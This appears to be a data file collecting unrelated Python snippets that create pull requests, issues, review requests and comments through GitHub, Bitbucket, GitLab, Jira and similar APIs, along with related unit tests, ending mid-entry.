[ "def create_pull_request(filepath, github_account):\n repo = _git.clone_from_github(\n _repo_path(), join(filepath, _repo_name()), github_account=github_account)\n branch = ('update-discovery-artifacts-' +\n datetime.datetime.now().strftime('%Y%m%d-%H%M%S'))\n repo.checkout_new(branch)\n if _update_disco(repo, github_account) > 0:\n repo.push(branch=branch)\n gh = Github(github_account.personal_access_token)\n gh_repo = gh.get_repo(_repo_path())\n pr = gh_repo.create_pull(\n title='chore: autogenerated discovery document update',\n body='',\n base='master',\n head=branch)", "def create(title, head, base='master', message=''):\n review_info = {\n 'title': title,\n 'body': message,\n 'head': head,\n 'base': base,\n }\n\n data = json_encode(review_info)\n review = parse(gh_request('POST', '/repos/:user/:repo/pulls', body=data))\n printers.print_review_created(review)", "def create_or_update_pull_request(jira_url, jira_username, jira_api_key, bitbucket_username, bitbucket_password,\n bitbucket_destination_branch_name, bitbucket_repository_name):\n click.echo('Pull request \"{}\" was created or updated'.format(\n create_or_update_pull_request_func(\n jira_url, jira_username, jira_api_key, bitbucket_username, bitbucket_password,\n bitbucket_destination_branch_name, bitbucket_repository_name\n )\n ))", "def main(assignee, browse, force, file, message, issue, base, head):\n # Above is copy/pasted from `man hub`\n\n branch_ready, error_msg = current_branch_is_pushed()\n if not branch_ready:\n if force:\n click.echo(\"force-opening not yet supported\")\n else:\n raise Exception(error_msg)\n\n assignment_label = get_assignment_label()\n if assignment_label is None:\n raise Exception(\"No label with the text 'review' and without the text 'self' found\")\n\n if not validate_assignee(assignee):\n raise Exception(\"No assignee named {} found\".format(assignee))\n\n if not message and not file:\n message = get_message()\n\n issue_number = create_pull_request(browse, force, file, message, issue, base, head)\n\n if not label_and_assign(issue_number, assignment_label, assignee):\n raise Exception(\"Failed to mark issue {issue_number} with label {label} and assign {assignee}\".format(\n issue_number=issue_number,\n label=assignment_label,\n assignee=assignee\n ))\n\n click.echo('PR opened!')", "def post(self):\n parser = reqparse.RequestParser()\n for arg in self.REQUIRED_ARGUMENTS:\n parser.add_argument(arg)\n parser.add_argument('token') # token is also required but it is checking separately\n args = parser.parse_args()\n\n if not args.get('token'):\n return {'message': 'Missing authorization token'}, 401\n\n if all(args.get(key) for key in self.REQUIRED_ARGUMENTS):\n repo_owner, repo_name = args['repository'].split('/') # full repository name format : 'owner/repo_name'\n\n post_data = {\"title\": args.get('title'),\n \"body\": args.get('body') or \"This is a pull request.\",\n \"head\": '{}:{}'.format(repo_owner, args['changeset']),\n # Regards to Github API documentation, changeset is the branch name\n \"base\": args.get('base')}\n\n headers = {'Authorization': 'Basic ' + args.get('token')}\n r = requests.post(flask.current_app.config['GITHUB_API_CREATE_PULL_REQUEST'].format(owner=repo_owner, repos=repo_name),\n data=json.dumps(post_data), headers=headers)\n\n if r.status_code == 201:\n number = r.json().get('number')\n resp = self._request_reviews(args.get('token'), repo_owner, repo_name, number, args.get('reviewers'))\n\n return resp.json(), r.status_code\n\n return r.json(), r.status_code\n else:\n missing_args = set(self.REQUIRED_ARGUMENTS) - {key for key in args.keys() if args.get(key)}\n return {'message': 'Missing required arguments : ' + ','.join(sorted(list(missing_args)))}, 422", "def create(self):\n resp = yield self.client.request(\n self.repo.base_path + \"/pulls\", params={\n \"title\": self.title,\n \"head\": self.head,\n \"base\": self.base,\n \"body\": self.body,\n \"maintainer_can_modify\": self.maintainer_can_modify\n },\n method=\"POST\")\n self.c = resp.data\n self.after_sync()\n self.num = self.c[\"number\"]\n raise gen.Return(self)", "def make_pull_request(\n issue, upstream=None, empty_commit=True, move_card=True, resolves_issue=True\n):\n if empty_commit:\n run_command('git commit --allow-empty -m \"Open Pull Request\"')\n\n subject = \"WIP: {}\".format(issue.subject)\n else:\n subject = issue.subject\n\n push_command = \"git push -u\"\n if upstream:\n push_command += \" {}\".format(upstream)\n\n run_command(push_command)\n\n if resolves_issue:\n action = \"Resolves\"\n else:\n action = \"Contributes to\"\n\n # Open the actual pull request\n message = \"{}\\n\\n{} {}/{}#{}\".format(\n subject, action, issue.owner, issue.repo, issue.issue_number\n )\n run_command('hub pull-request -o -m \"{}\" --edit'.format(message), _fg=True)\n\n if move_card:\n move_card_column(issue.issue_number, \"feedback\")", "def create_pull(self, title, head, base, body, # pylint: disable=R0913\n maintainer_can_modify=False):\n pull = self.make(PullRequest, self, 0)\n pull.title = title\n pull.head = head\n pull.base = base\n pull.body = body\n pull.maintainer_can_modify = maintainer_can_modify\n return pull.create()", "def issue_create():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-a\", \"--assignees\", default=[], nargs=\"*\", help=\"users to assign to this issue\"\n )\n parser.add_argument(\"-b\", \"--body\", default=None, help=\"text body of the issue\")\n parser.add_argument(\n \"-c\",\n \"--column\",\n default=DEFAULT_COLUMN_NAME,\n help=\"name of column to place card in\",\n )\n parser.add_argument(\n \"-i\",\n \"--interactive\",\n action=\"store_true\",\n default=DEFAULT_COLUMN_NAME,\n help=\"Edit issue title and body in vim\",\n )\n parser.add_argument(\n \"-l\", \"--labels\", default=None, nargs=\"*\", help=\"labels to add to the new issue\"\n )\n parser.add_argument(\n \"-m\",\n \"--milestone\",\n default=None,\n help=\"milestone id to place this issue in. \"\n \"This should be an integer. \"\n \"Find milestone ids with the `milestones` command.\",\n )\n parser.add_argument(\n \"-p\", \"--project\", default=SCRUM_BOARD_NAME, help=\"project to create issue in\"\n )\n parser.add_argument(\"title\", default=None, nargs=\"?\", help=\"issue title\")\n\n args = parser.parse_args()\n\n # only required arg for creating an issue. can be overridden in interactive mode\n title = args.title\n\n # this can be overridden in interactive mode\n body = args.body\n\n if args.interactive:\n with tempfile.NamedTemporaryFile(\"w\") as fh:\n path = fh.name\n\n editor = os.environ.get(\"EDITOR\", os.environ.get(\"VISUAL\", \"vi\"))\n\n proc = getattr(sh, editor)\n\n proc(path, _fg=True)\n\n with open(path, \"r\") as rfh:\n\n # grab top line as title\n title = rfh.readline().replace(\"\\n\", \"\")\n\n # grab remaining lines as body\n body = \"\".join(rfh.readlines())\n\n session = GithubSession()\n\n additional_args = {\n \"assignees\": args.assignees,\n \"body\": body,\n \"labels\": args.labels,\n \"milestone\": args.milestone,\n }\n\n issue = session.create_issue(title, **additional_args)\n\n column_name = args.column\n project_name = args.project\n\n project = session.get_project(project_name)\n column = session.get_column(project, column_name)\n\n # finally, create the card\n session.create_card(column, issue)\n\n print(json.dumps(issue, indent=2))", "async def pr(ctx, number: Option(int, \"Pull request number\")):\n url = f\"{repo}/issues/{number}\"\n view = discord.ui.View()\n view.add_item(discord.ui.Button(label=\"View Pull Request\", url=url))\n await ctx.respond(f\"Here's a link\", view=view)", "def new_review_request(self, changenum=None, submit_as=None, diff_only=False):\r\n try:\r\n data = { 'repository_path': self.info.path }\r\n\r\n if changenum:\r\n data['changenum'] = changenum\r\n\r\n if submit_as:\r\n self.debug('Submitting the review request as %s' % submit_as)\r\n data['submit_as'] = submit_as\r\n\r\n rsp = self.api_call('api/review-requests/new/', data)\r\n except APIError, e:\r\n rsp, = e.args\r\n\r\n if not diff_only:\r\n if rsp['err']['code'] == 204: # Change number in use\r\n self.debug('Review request already exists. Updating it...')\r\n rsp = self.api_call(\r\n 'api/review-requests/%s/update_from_changenum/' %\r\n rsp['review_request']['id'])\r\n else:\r\n raise e\r\n\r\n self.debug('Review request created')\r\n return rsp['review_request']", "def create_new_issue(\n self,\n token: str,\n object_id: str,\n customer_id: str,\n project_id: str,\n scope_id: str,\n issue_name: str,\n region: str,\n business_unit: str,\n date_of_raise: str,\n due_date: str,\n nature_of_issue: str,\n criticality: str,\n issue_description: str,\n impact_value: str,\n currency: str,\n impact_on: str,\n document_ref: dict,\n issue_owner: dict,\n resolution_path: str,\n ):\n\n # Type guarding\n assert check_argument_types()\n\n # TODO: make table name environment variable\n table_name = f\"Projects-{customer_id}\"\n\n # Key\n key = {\"projectId\": project_id, \"customerId\": customer_id}\n\n # Projection Expression\n projection_expression = \", \".join([\"projectId\", \"code\"])\n\n # Check if customer and project exist\n logger.info(f\"Checking if project ID or organization ID exists: {key}\")\n response, _ = self._db.read_single_item(table_name, key, projection_expression)\n\n # Get project code\n project_code = response[\"code\"]\n\n # Request body\n dynamo_object = {\n \"scopeId\": scope_id,\n \"issueName\": issue_name,\n \"region\": region,\n \"businessUnit\": business_unit,\n \"dateOfRaise\": date_of_raise,\n \"dueDate\": due_date,\n \"natureOfIssue\": nature_of_issue,\n \"criticality\": criticality,\n \"issueDescription\": issue_description,\n \"status\": \"open\",\n \"impactValue\": impact_value,\n \"currency\": currency,\n \"impactOn\": impact_on,\n \"documentRef\": document_ref,\n \"issueOwner\": issue_owner,\n \"resolutionPath\": resolution_path,\n \"lastUpdated\": str(date.today()),\n \"issueId\": object_id,\n }\n\n # Send project onboarding email\n logger.info(\"Sending project onboarding email\")\n self._email.send_template_email(\n source=getenv(\"SOURCE_EMAIL_ADDRESS\"),\n template_name=getenv(\"ISSUE_ASSIGNMENT_TEMPLATE\"),\n template_data=json.dumps(\n {\n \"issueId\": f'\"{dynamo_object[\"issueName\"]}\"',\n \"projectCode\": project_code,\n }\n ),\n bcc_addresses=[issue_owner[\"email\"]],\n )\n\n # Dynamo update expressions & update\n logger.info(\"Create new project issue\")\n update_expression = (\n f\"SET scopes.#scopeId.issues.#IssueId = :{dynamo_object['issueId']}\"\n )\n expression_attribute_names = {\n \"#scopeId\": scope_id,\n \"#IssueId\": dynamo_object[\"issueId\"]\n }\n expression_attribute_values = {f\":{dynamo_object['issueId']}\": dynamo_object}\n self._db.update_item(\n table_name,\n key,\n update_expression,\n expression_attribute_names,\n expression_attribute_values,\n )\n\n # Log workflow\n message = [f\"Created new issue: {issue_name}\"]\n workflow = Workflows.update_workflows(\n token, \"Create\", message, project_id, dynamo_object[\"issueId\"]\n )\n self._db.create_item(f\"Workflows-{customer_id}\", workflow)\n\n logger.info(\"New issue created successfully\")\n return \"New issue created successfully\", 200", "def test_build_new_review_request(self):\n repository = self._create_repository()\n review_request = self.create_review_request(repository=repository)\n diffset = self.create_diffset(review_request=review_request)\n diffset.base_commit_id = '8fd69d70f07b57c21ad8733c1c04ae604d21493f'\n diffset.save()\n\n config = self._create_config()\n self.integration.enable_integration()\n\n data = self._spy_on_make_request()\n\n review_request.publish(review_request.submitter)\n\n self.assertTrue(TravisAPI._make_request.called)\n\n self.assertEqual(\n data['url'],\n 'https://api.travis-ci.org/repo/mypublicorg%2Fmypublicorgrepo/'\n 'requests')\n\n self.assertEqual(\n data['request']['config']['env']['global'],\n [\n 'REVIEWBOARD_STATUS_UPDATE_ID=1',\n 'REVIEWBOARD_TRAVIS_INTEGRATION_CONFIG_ID=%d' % config.pk,\n ])\n\n self.assertEqual(data['request']['message'],\n 'Test Summary\\n\\nTest Description')\n self.assertTrue('git fetch --unshallow origin || true'\n in data['request']['config']['before_install'])\n self.assertTrue('git checkout %s' % diffset.base_commit_id\n in data['request']['config']['before_install'])\n self.assertEqual(data['request']['branch'], 'review-requests')", "def create_issue(self, data, **kwargs):\n raise NotImplementedError", "def create_issue(self, data, **kwargs):\n raise NotImplementedError", "def create(self, comment):\r\n url = self.get_url()\r\n\r\n # when creating commits they don't get wrapped in {\"body\": <comment>}\r\n return http.Request('POST', url, params=comment), parsers.parse_json", "def sendpr(m='This is PR', b='lf-dev', h=None):\n command = 'hub pull-request -m \"%s\" -b %s' % (m,b)\n\n current_branch_cmd = shlex.split('git rev-parse --abbrev-ref HEAD')\n process = subprocess.Popen(current_branch_cmd, stdout=subprocess.PIPE)\n current_branch, err = process.communicate()\n print('current_branch', current_branch)\n if not h:\n cmd = shlex.split(command)\n else:\n command = command + '-h %s' % (h)\n cmd = shlex.split(command)\n current_branch = h\n\n cmd = shlex.split(command)\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE)\n output, err = process.communicate()\n message = m + \" PR from %s @ %s reviewers @%s @%s \\n URL: %s \\n %s >>> %s\" % (DEV_NAME,\n datetime.datetime.now().strftime(\"%y-%m-%d-%H-%M\"),\n REVIEWER[0], REVIEWER[1], output , b,\n current_branch)\n data = {\n \"color\":\"green\",\n \"message\":message,\n \"notify\":True,\n \"message_format\":\"text\"\n }\n req = urllib2.Request(HIPCHAT_WEB_HOOK)\n req.add_header(\"Content-Type\", \"application/json\")\n urllib2.urlopen(req, json.dumps(data))", "def test_issue_create_issue(self):\n pass", "def review(args):\n try:\n pr = gh.get_pr(owner, repo, args.pull_request)\n except requests.exceptions.HTTPError:\n print('Couldn\\'t find pull request #%s in %s/%s.' %\n (args.pull_request, owner, repo))\n print('Make sure the number is correct and that you have read '\n 'permissions for this GitHub repository.')\n sys.exit(1)\n\n clone_url = pr['head']['repo']['clone_url']\n fork_branch = pr['head']['ref']\n fork_owner = pr['head']['repo']['owner']['login']\n\n repo_lib.fetch_fork(clone_url, fork_branch, fork_owner)\n repo_lib.checkout(fork_branch, fork_owner)\n sys.exit(0)", "def test_issue_create_comment(self):\n pass", "def create_comment(self, body):\n return self.client.request(\n \"{}/issues/{}/comments\".format(self.repo.base_path, self.num),\n params={\"body\": body},\n method=\"POST\"\n )", "def pullrequest(self, number):\r\n return pullrequests.PullRequest(self, number)", "def post_to_github(results: List[dict]):\n\n tests_info_body = ''\n has_failed = False\n for result in results:\n if result['status'] == 'passed':\n tests_info_body += f':white_check_mark: `{result[\"command\"]}`\\n'\n else:\n has_failed = True\n tests_info_body += f':x: `{result[\"command\"]}`\\n```{result[\"output\"]}```\\n<br>'\n\n pr_body = 'Whoopsie. Looks like there are some issues with this PR. :space_invader:' if \\\n has_failed else 'This PR is good to go ! :tada:'\n\n pr_body += f'\\n\\n<details><summary><strong>Tests</strong></summary><p>\\n\\n{tests_info_body}\\n</p></details>'\n\n try:\n source_repo = '/'.join(os.getenv('CODEBUILD_SOURCE_REPO_URL')[:-4].split('/')[-2:])\n source_commit_hash = os.getenv('CODEBUILD_RESOLVED_SOURCE_VERSION')\n source_pr = int(os.getenv('CODEBUILD_WEBHOOK_PR', '0'))\n\n if source_pr > 0:\n g = Github(os.getenv('GITHUB_API_TOKEN', ''))\n repo = g.get_repo(source_repo)\n pr: PullRequest = repo.get_pull(source_pr)\n\n print(\n f'Creating review comment: '\n f'pr -> {pr.title} // '\n f'commit -> {source_commit_hash} // '\n f'has_failed -> {has_failed}'\n )\n\n pr.create_review(\n repo.get_commit(sha=source_commit_hash),\n pr_body,\n 'REQUEST_CHANGES' if has_failed else 'APPROVE'\n )\n finally:\n if has_failed:\n print('Test(s) failed.')\n exit(1)", "async def create_issue(\n self,\n title: str or None = None,\n body: str or None = None,\n state: str or None = None,\n milestone: int or None = None,\n labels: [str] or None = None,\n assignees: [str] or None = None,\n ):\n _endpoint = f\"/repos/{self.full_name}/issues\"\n\n data = {}\n if title is not None:\n data[\"title\"] = title\n if body is not None:\n data[\"body\"] = body\n if state is not None:\n data[\"state\"] = state\n if milestone is not None:\n data[\"milestone\"] = milestone\n if labels is not None:\n data[\"labels\"] = labels\n if assignees is not None:\n data[\"assignees\"] = assignees\n\n issue = await self.client.post(endpoint=_endpoint, data=data, jsondata=True)\n return AIOGitHubAPIRepositoryIssue(self.client, issue)", "def test_build_new_review_request_with_public_github_repository(self):\n repository = self._create_repository(repository_plan='public')\n review_request = self.create_review_request(repository=repository)\n diffset = self.create_diffset(review_request=review_request)\n diffset.base_commit_id = '8fd69d70f07b57c21ad8733c1c04ae604d21493f'\n diffset.save()\n\n self._create_config()\n self.integration.enable_integration()\n\n data = self._spy_on_make_request()\n\n review_request.publish(review_request.submitter)\n\n self.assertTrue(TravisAPI._make_request.called)\n\n self.assertEqual(\n data['url'],\n 'https://api.travis-ci.org/repo/myuser%2Fmypublicrepo/requests')", "def createmergerequest2(\n self, project_id, sourcebranch, targetprojectid, targetbranch, title, assignee_id=None, sudo=\"\"\n ):\n import requests\n\n url_str = '{0}/{1}/merge_requests'.format(self.projects_url, project_id)\n data = {'source_branch': sourcebranch,\n 'target_project_id': targetprojectid,\n 'target_branch': targetbranch,\n 'title': title,\n 'assignee_id': assignee_id}\n if sudo != \"\":\n data['sudo'] = sudo\n\n request = requests.post(url_str, data=data, headers=self.headers,\n verify=self.verify_ssl)\n if request.status_code == 201:\n return True\n else:\n\n return False", "def issues_insert(self, mar, request):\n if not mar.perms.CanUsePerm(\n permissions.CREATE_ISSUE, mar.auth.effective_ids, mar.project, []):\n raise permissions.PermissionException(\n 'The requester %s is not allowed to create issues for project %s.' %\n (mar.auth.email, mar.project_name))\n\n with work_env.WorkEnv(mar, self._services) as we:\n owner_id = None\n if request.owner and request.owner.name:\n try:\n owner_id = self._services.user.LookupUserID(\n mar.cnxn, request.owner.name)\n except exceptions.NoSuchUserException:\n raise endpoints.BadRequestException(\n 'The specified owner %s does not exist.' % request.owner.name)\n\n cc_ids = []\n request.cc = [cc for cc in request.cc if cc]\n if request.cc:\n cc_ids = list(self._services.user.LookupUserIDs(\n mar.cnxn, [ap.name for ap in request.cc],\n autocreate=True).values())\n comp_ids = api_pb2_v1_helpers.convert_component_ids(\n mar.config, request.components)\n fields_add, _, _, fields_labels, _ = (\n api_pb2_v1_helpers.convert_field_values(\n request.fieldValues, mar, self._services))\n field_helpers.ValidateCustomFields(\n mar, self._services, fields_add, mar.config, mar.errors)\n if mar.errors.AnyErrors():\n raise endpoints.BadRequestException(\n 'Invalid field values: %s' % mar.errors.custom_fields)\n\n logging.info('request.author is %r', request.author)\n reporter_id, timestamp = self.parse_imported_reporter(mar, request)\n new_issue, _ = we.CreateIssue(\n mar.project_id, request.summary, request.status, owner_id,\n cc_ids, request.labels + fields_labels, fields_add,\n comp_ids, request.description,\n blocked_on=api_pb2_v1_helpers.convert_issueref_pbs(\n request.blockedOn, mar, self._services),\n blocking=api_pb2_v1_helpers.convert_issueref_pbs(\n request.blocking, mar, self._services),\n reporter_id=reporter_id, timestamp=timestamp,\n send_email=request.sendEmail)\n we.StarIssue(new_issue, True)\n\n return api_pb2_v1_helpers.convert_issue(\n api_pb2_v1.IssuesGetInsertResponse, new_issue, mar, self._services)", "def create_pull_requests(self, repos, key, msrp, summary, cred_hash, qa_title):\n response = {'status': True, 'data': []}\n\n for repo in repos:\n repo_name = repo['repositoryName']\n reviewed_branch = repo['reviewedBranch']\n base_branch = repo['baseBranch']\n\n json_data = {\n \"title\": qa_title,\n \"description\": summary,\n \"state\": \"OPEN\",\n \"open\": True,\n \"closed\": False,\n \"fromRef\": {\n \"id\": f\"refs/heads/{reviewed_branch}\",\n \"repository\": {\n \"slug\": repo_name,\n \"name\": None,\n \"project\": {\n \"key\": self.code_cloud_api.project_name\n }\n }\n },\n \"toRef\": {\n \"id\": f\"refs/heads/{base_branch}\",\n \"repository\": {\n \"slug\": repo_name,\n \"name\": None,\n \"project\": {\n \"key\": self.code_cloud_api.project_name\n }\n }\n },\n \"locked\": False,\n \"reviewers\": [],\n \"links\": {\"self\":[None]}\n }\n\n url = f'{self.code_cloud_api.branch_api}/{repo_name}/pull-requests'\n pull_response = self.code_cloud_api.post_json(\n url=url, \n json_data=json_data, \n cred_hash=cred_hash\n )\n\n if not pull_response['status']:\n response['data'].append({\n 'error': pull_response['data']['errors'][0]['message'],\n 'repo': repo_name\n })\n else:\n response['data'].append({\n 'link': pull_response['data']['links']['self'][0]['href'],\n 'repo': repo_name\n })\n\n return response", "def test_build_new_review_request_with_private_github_repository(self):\n repository = self._create_repository(repository_plan='private')\n review_request = self.create_review_request(repository=repository)\n diffset = self.create_diffset(review_request=review_request)\n diffset.base_commit_id = '8fd69d70f07b57c21ad8733c1c04ae604d21493f'\n diffset.save()\n\n self._create_config()\n self.integration.enable_integration()\n\n data = self._spy_on_make_request()\n\n review_request.publish(review_request.submitter)\n\n self.assertTrue(TravisAPI._make_request.called)\n\n self.assertEqual(\n data['url'],\n 'https://api.travis-ci.org/repo/myuser%2Fmyprivaterepo/requests')", "def create_issue(self, group, form_data, **kwargs):\n headers = { \"X-Redmine-API-Key\": self.get_option('key', group.project),\n 'content-type': 'application/json' }\n verifySSL = self.get_option('verify_ssl', group.project)\n url = urlparse.urljoin(self.get_option('host', group.project), \"issues.json\")\n payload = {\n 'project_id': self.get_option('project_id', group.project),\n 'tracker_id': self.get_option('tracker_id', group.project),\n 'status_id': '0',\n 'subject': form_data['title'].encode('utf-8'),\n 'description': form_data['description'].encode('utf-8'),\n }\n #print >> sys.stderr, \"url:\", url\n #print >> sys.stderr, \"payload:\\n\", pformat(payload)\n #print >> sys.stderr, pformat(group)\n #print >> sys.stderr, pformat(dir(group))\n\n try:\n r = requests.post(url, data=json.dumps({'issue': payload}), headers=headers, verify=verifySSL)\n except requests.exceptions.HTTPError as e:\n raise forms.ValidationError('Unable to reach Redmine host: %s' % repr(e))\n\n try:\n data = json.loads(r.text)\n except json.JSONDecodeError as e:\n #print >> sys.stderr, \"ERROR: %s\" % e\n #print >> sys.stderr, \"RESP:\", r.text\n raise forms.ValidationError('Unable to reach Redmine host: %s' % repr(e))\n\n if not 'issue' in data or not 'id' in data['issue']:\n raise forms.ValidationError('Unable to create redmine ticket')\n\n return data['issue']['id']", "def test_create_with_existing_new_draft(self):\n review_request = self.create_review_request(\n publish=True,\n bugs_closed='1,20,300',\n commit_id='abc123',\n description_rich_text=True,\n rich_text=True,\n testing_done_rich_text=True,\n extra_data={\n 'key': {\n 'values': [1, 2, 3],\n },\n 'mybool': True,\n })\n\n # Create the first draft.\n orig_draft = ReviewRequestDraft.create(review_request)\n self.assertIsNotNone(orig_draft.changedesc)\n\n # Try to create it again.\n draft = ReviewRequestDraft.create(review_request)\n self.assertIsNotNone(draft.changedesc)\n\n self.assertEqual(orig_draft, draft)\n self.assertEqual(orig_draft.changedesc, draft.changedesc)", "def main(github_token, branch_name, repository, sha):\n create_branch(github_token, branch_name, repository, sha)\n click.echo(f\"Successfully created branch {branch_name}\")", "def post_pr_review(owner, repo,\n commit_sha, pull_number,\n message, event='COMMENT'):\n review = {\n 'commit_id': commit_sha,\n 'body': message,\n 'event': event,\n }\n\n res = post(GIT_PULL_REVIEW_URL.format(host=host_api,\n owner=owner,\n repo=repo,\n pull_number=pull_number),\n json=review, auth=auth)\n assert res.status_code == 200, f'Got non 201 status, ' \\\n f'error message: {res.content}'", "def test_build_new_review_request_with_private_org_github_repository(self):\n repository = self._create_repository(repository_plan='private-org')\n review_request = self.create_review_request(repository=repository)\n diffset = self.create_diffset(review_request=review_request)\n diffset.base_commit_id = '8fd69d70f07b57c21ad8733c1c04ae604d21493f'\n diffset.save()\n\n self._create_config()\n self.integration.enable_integration()\n\n data = self._spy_on_make_request()\n\n review_request.publish(review_request.submitter)\n\n self.assertTrue(TravisAPI._make_request.called)\n\n self.assertEqual(\n data['url'],\n 'https://api.travis-ci.org/repo/'\n 'myprivateorg%2Fmyprivateorgrepo/requests')", "def _create_issue(self, dep_name, dep_latest_version, is_subtask=False, parent_key=None):\n logging.info(\"Creating a new JIRA issue to track {0} upgrade process\".format(dep_name))\n assignee, owners = self._find_owners(dep_name)\n summary = _ISSUE_SUMMARY_PREFIX + dep_name\n if dep_latest_version:\n summary = summary + \" \" + dep_latest_version\n description = \"\"\"\\n\\n{0}\\n\n Please review and upgrade the {1} to the latest version {2} \\n \n cc: \"\"\".format(\n datetime.today(),\n dep_name,\n dep_latest_version\n )\n for owner in owners:\n description += \"[~{0}], \".format(owner)\n try:\n if not is_subtask:\n issue = self.jira.create_issue(summary, [_JIRA_COMPONENT], description, assignee=assignee)\n else:\n issue = self.jira.create_issue(summary, [_JIRA_COMPONENT], description, assignee=assignee, parent_key=parent_key)\n except Exception as e:\n logging.error(\"Failed creating issue: \"+ str(e))\n raise e\n return issue", "def test_is_new_pr(requests_mock):\n from AzureDevOps import Client, is_new_pr\n\n authorization_url = 'https://login.microsoftonline.com/organizations/oauth2/v2.0/token'\n requests_mock.post(authorization_url, json=get_azure_access_token_mock())\n\n project = 'test'\n repository = 'xsoar'\n\n url = f'{BASE_URL}/{project}/_apis/git/repositories/{repository}/pullrequests/'\n\n mock_response = json.loads(load_mock_response('list_pull_request.json'))\n requests_mock.get(url, json=mock_response)\n\n client = Client(\n client_id=CLIENT_ID,\n organization=ORGANIZATION,\n verify=False,\n proxy=False,\n auth_type='Device Code')\n\n assert is_new_pr(project, repository, client, 23)\n assert is_new_pr(project, repository, client, 22)\n assert not is_new_pr(project, repository, client, 24)\n assert not is_new_pr(project, repository, client, 25)", "def __create_ticket(user, subject, description, topic):\n\n target = settings.SLACK_TARGET_TFED\n if topic == 'Database':\n target = settings.SLACK_TARGET_TFED_DB\n user_email = user['user']['profile'].get('email', 'lnl-no-reply@wpi.edu')\n display_name = user['user']['profile']['real_name']\n resp = rt_api.create_ticket(topic, user_email, subject, description + \"\\n\\n- \" + display_name)\n ticket_id = resp.get('id', None)\n if ticket_id:\n ticket_info = {\n \"url\": 'https://lnl-rt.wpi.edu/rt/Ticket/Display.html?id=' + ticket_id,\n \"id\": ticket_id,\n \"subject\": subject,\n \"description\": description,\n \"status\": \"New\",\n \"assignee\": None,\n \"reporter\": user['user']['name']\n }\n ticket = views.tfed_ticket(ticket_info)\n slack_post(target, text=description, content=ticket, username='Request Tracker')\n return\n error_message = \"Whoops! It appears something went wrong while attempting to submit your request. \" \\\n \"Please wait a few minutes then try again. If the problem persists, please email \" \\\n \"us directly at tfed@wpi.edu.\"\n post_ephemeral(target, error_message, user['user']['id'], username=\"Request Tracker\")", "def new_repo(req, source, psp_dir, url_helper=None):\n req.content_type = 'text/html'\n repo_dir = req.filename.rsplit('/', 1)[0]\n files = [f for f in os.listdir(repo_dir) if f[-3:] == '.h5']\n top_level = psp.PSP(req, filename=psp_dir+'new_repo.psp')\n top_level.run({'context': req.uri,\n 'files': files})", "def api_repo_create():\n form = NewRepoForm()\n if form.validate_on_submit():\n # On the miniscule chance we generate a non-unique access key, loop and try again.\n success = False\n while not success:\n new_repo = Repo.create(\n pass_phrase = form.pass_phrase.data,\n title = form.title.data,\n description = form.description.data,\n is_private = form.is_private.data\n )\n db.session.add(new_repo)\n try:\n db.session.commit()\n success = True\n except:\n db.session.rollback()\n success = False\n session['working_repo'] = new_repo.access_key\n return jsonify(message='success', created=new_repo.access_key)\n else:\n return jsonify(message=\"failed\", errors=form.errors_to_json()), 400", "def submit_feedback(self, title, description, state):\n\n body = f\"\"\"\n**User Issue**\nEmail: {self.user.email}\nUser Agent: {get_user_agent(self.request)}\n\n{description}\n\n<details>\n\n<summary>Redux state</summary>\n\n<p>\n\n```json\n{json.dumps(state, indent=2)}\n```\n\n</p>\n</details>\n \"\"\"\n\n r = requests.post(\n 'https://api.github.com/repos/alexmojaki/futurecoder/issues',\n json={'title': title,\n 'body': body,\n 'labels': ['user', 'bug']},\n headers=dict(\n Authorization='token ' + settings.GITHUB_TOKEN,\n ),\n )\n\n assert r.status_code == 201", "def test_new_Issue(self, requests_post, get_landowner):\n #requests_post.status_code.return_value = 200\n requests_post.json.return_value = {'features': []}\n get_landowner.return_value = 'TEST landowner'\n cat = Category(name=\"test category\")\n cat.save()\n issue = Issue(description=\"test issue\", position=Point(5, 23), category=cat)\n issue.save()\n self.assertEqual(len(Issue.objects.all()), 1)\n issue = Issue(id=666, description=\"test issue with defined id\", position=Point(5, 23), category=cat)\n issue.save()\n self.assertEqual(issue.id, 666)", "def create_branch_from_issue(jira_url, jira_username, jira_api_key, project_key, source_branch_name, issue_key):\n click.echo('Branch \"{}\" was created'.format(\n create_branch_func(\n source_branch_name, get_branch_name(jira_url, jira_username, jira_api_key, issue_key, project_key)\n )\n ))", "def create(self, number, message, user=None, repo=None):\n request = self.make_request('issues.comments.create', user=user,\n repo=repo, number=number, body={'body': message})\n return self._post(request)", "def createRequest(self):\n self.get_bmc_website()\n self.__createChangeRequest = Create(self.browser)\n self.__createChangeRequest.createNCR()", "def create_repo_cli(api_client, url, provider, path):\n content = ReposApi(api_client).create(url, provider, path)\n click.echo(pretty_format(content))", "def test_issue_create_milestone(self):\n pass", "def createcomment(request, pk):\n issue = get_object_or_404(Issue, pk=pk)\n if request.method == \"POST\":\n form = CommentCreationForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.issue = issue\n comment.author = request.user\n comment.created_at = timezone.now()\n comment.save()\n return redirect('office:issue', pk=pk)\n else:\n form = CommentForm()\n return render(request, 'blog/add_comment_to_post.html', {'form': form})", "def test_create_project_request(self):\n pass", "def create_issue_request(\n pk: PublicKey,\n user_attributes: AttributeMap\n ) -> Tuple[IssueRequest, Bn]:\n attributes = [Bn.from_binary(a_i) for a_i in user_attributes.values()]\n Y1s = [pk.Y1[a] for a in user_attributes.keys()]\n\n # Calculate C\n t = G1.order().random()\n C = pk.g1 ** t\n for Y1_i, a_i in zip(Y1s, attributes):\n C *= Y1_i ** a_i\n\n # Proof that C has been calculated correctly\n proof = FiatShamirProof(\n G1, C, pk, # type:ignore\n [pk.g1] + Y1s, # type:ignore\n [t] + attributes\n )\n\n return IssueRequest(C, proof), t", "def create(self, request):\n lot = Lot.objects.get(pk=request.data[\"lotId\"])\n\n project = Project()\n project.name = request.data[\"name\"]\n project.estimatedCost = request.data[\"estimatedCost\"]\n project.estimatedCompletionDate = request.data[\"estimatedCompletionDate\"]\n project.lotId = lot\n #projectNote=projectNote\n\n\n try:\n project.save()\n serializer = ProjectSerializer(project, context={'request': request}) #converting data into json\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n except ValidationError as ex:\n return Response({\"reason\": ex.message}, status=status.HTTP_400_BAD_REQUEST)", "def make_submission(commit: CommitDetails):\n\n submitter, commit_id = commit.submitter, commit.commit_id\n\n subprocess.run(f\"git checkout --force {commit_id}\", shell=True, stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL, 